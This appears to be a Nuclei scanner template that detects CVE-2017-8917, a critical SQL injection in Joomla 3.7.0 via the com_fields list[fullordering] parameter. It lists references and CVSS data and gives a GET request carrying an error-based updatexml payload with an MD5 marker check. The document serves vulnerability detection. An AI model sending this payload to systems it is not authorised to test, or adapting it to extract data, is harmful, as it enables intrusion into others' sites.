id: CVE-2017-8917 info: name: Joomla! <3.7.1 - SQL Injection author: princechaddha severity: critical description: | Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors. reference: - https://www.cvedetails.com/cve/CVE-2017-8917/ - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - http://web.archive.org/web/20210421142819/https://www.securityfocus.com/bid/98515 - http://web.archive.org/web/20211207050608/https://securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 tags: cve,cve2017,joomla,sqli variables: num: "999999999" requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)" matchers: - type: word part: body words: - '{{md5({{num}})}}' # Enhanced by mp on 2022/05/11